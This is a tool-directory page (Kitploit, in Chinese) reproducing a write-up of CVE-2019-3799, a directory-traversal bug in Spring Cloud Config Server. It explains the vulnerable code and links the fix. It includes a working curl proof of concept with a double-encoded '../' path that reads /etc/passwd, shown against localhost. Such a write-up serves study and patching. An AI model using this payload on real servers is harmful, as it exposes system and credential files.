Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-3799 — CVE-2019-3799 - Spring Cloud Config Server:目录遍历 < 2.1.2, 2.0.4, 1.4.6 | Kitploit
工具/GitHubGitHub/mpgn/cve-2019-3799
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubmpgn/cve-2019-3799

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server:目录遍历 < 2.1.2, 2.0.4, 1.4.6

查看仓库
31557年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-3799 - Spring-Cloud-Config-Server 目录遍历漏洞 < 2.1.2, 2.0.4, 1.4.6

Spring Cloud Config Server 存在目录遍历/路径穿越/文件内容泄露漏洞,影响版本 < 2.1.2, 2.0.4, 1.4.6

Spring Cloud Config 2.1.x 系列早于 2.1.2、2.0.x 系列早于 2.0.4、1.4.x 系列早于 1.4.6 的版本,以及更早的不受支持版本,允许应用程序通过 spring-cloud-config-server 模块提供任意配置文件。恶意用户或攻击者可以利用特制的 URL 发起目录遍历攻击。

capture d'écran_1

发现者:Vern ([email protected])

安全公告

  • https://pivotal.io/security/cve-2019-3799
  • https://spring.io/blog/2019/04/17/cve-2019-3799-spring-cloud-config-2-1-2-2-0-4-1-4-6-released

技术分析

  • https://chybeta.github.io/2019/04/18/%E3%80%90CVE-2019-3799%E3%80%91-Directory-Traversal-with-spring-cloud-config-server/

概念验证

  1. 下载漏洞版本的 Spring Cloud Config https://github.com/spring-cloud/spring-cloud-config
  2. 运行应用
cd spring-cloud-config-server                                                                                                                                                                     
../mvnw spring-boot:run
  1. 利用
curl http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd                                                                                                    

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

漏洞原理

一如既往,阅读文档可以找到相关信息:

提供纯文本文件:https://cloud.spring.io/spring-cloud-static/spring-cloud-config/1.3.1.RELEASE/#_serving_plain_text

Config Server 通过一个额外的端点 /{name}/{profile}/{label}/{path} 提供这些文件,其中 "name"、"profile" 和 "label" 的含义与常规环境端点相同,而 "path" 是文件名(例如 log.xml)。

Server 通过额外的端点 /{name}/{profile}/{label}/{path} 提供这些文件。

文档中另一个有趣的信息:

对于基于 VCS 的后端(git、svn),文件会被检出或克隆到本地文件系统。默认情况下,它们被放置在系统临时目录中,前缀为 config-repo-。在 Linux 上,例如可能是 /tmp/config-repo-

当我们发送 http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd 时会发生什么:

  1. 请求被映射到

https://github.com/spring-cloud/spring-cloud-config/blob/3c0348ca624f9f3b370797799a3608840fed2d8b/spring-cloud-config-server/src/main/java/org/springframework/cloud/config/server/resource/ResourceController.java#L71

@RequestMapping("/{name}/{profile}/{label}/**")
public String retrieve(@PathVariable String name, @PathVariable String profile,
    @PathVariable String label, ServletWebRequest request,
    @RequestParam(defaultValue = "true") boolean resolvePlaceholders)
    throws IOException {
  String path = getFilePath(request, name, profile, label);
  return retrieve(request, name, profile, label, path, resolvePlaceholders);
}
  1. 函数 retrieve 调用函数 findOne

https://github.com/spring-cloud/spring-cloud-config/blob/3c0348ca624f9f3b370797799a3608840fed2d8b/spring-cloud-config-server/src/main/java/org/springframework/cloud/config/server/resource/ResourceController.java#L103

synchronized String retrieve(ServletWebRequest request, String name, String profile,
    String label, String path, boolean resolvePlaceholders) throws IOException {
  name = resolveName(name);
  label = resolveLabel(label);
  Resource resource = this.resourceRepository.findOne(name, profile, label, path); // path: ..%2f..%2f..%2f..%2f..%2f../etc/passwd
  if (checkNotModified(request, resource)) {
    // Content was not modified. Just return.
    return null;
  }
  // ensure InputStream will be closed to prevent file locks on Windows
  try (InputStream is = resource.getInputStream()) {
    String text = StreamUtils.copyToString(is, Charset.forName("UTF-8"));
    if (resolvePlaceholders) {
      Environment environment = this.environmentRepository.findOne(name,
          profile, label);
      text = resolvePlaceholders(prepareEnvironment(environment), text);
    }
    return text;
  }
}
  1. 函数 findOne 被调用:
public synchronized Resource findOne(String application, String profile, String label, String path) {
  if (StringUtils.hasText(path)) {
    String[] locations = this.service.getLocations(application, profile, label).getLocations(); // /tmp/config-repo-<randomid>
    try {
      for (int i = locations.length; i-- > 0; ) {
        String location = locations[i]; // [1]..%2f..%2f..%2f..%2f..%2f../etc/passwd
        for (String local : getProfilePaths(profile, path)) {
            Resource file = this.resourceLoader.getResource(location).createRelative(local); // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            if (file.exists() && file.isReadable()) {
                return file; // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            }
          }
        }
      }
    }
    catch (IOException e) {
        throw new NoSuchResourceException(
                "Error : " + path + ". (" + e.getMessage() + ")");
    }
  }
  throw new NoSuchResourceException("Not found: " + path);
}
  1. 然后函数 retrieve 使用 StreamUtils.copyToString(is, Charset.forName("UTF-8") 读取文件,该操作将 /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd 转换为 /etc/passwd,从而导致 /etc/passwd 文件内容泄露

capture d'écran_4


修复:https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2

capture d'écran

From 3632fc6f64e567286c42c5a2f1b8142bfde505c2 Mon Sep 17 00:00:00 2001
From: Spencer Gibb <[email protected]>
Date: Tue, 2 Apr 2019 14:16:10 -0400
Subject: [PATCH] 清理无效路径

修复 gh-1355
---
 .../resource/GenericResourceRepository.java   | 165 ++++++++++++++++--
 .../GenericResourceRepositoryTests.java       |  18 ++
 2 files changed, 170 insertions(+), 13 deletions(-)
下载工具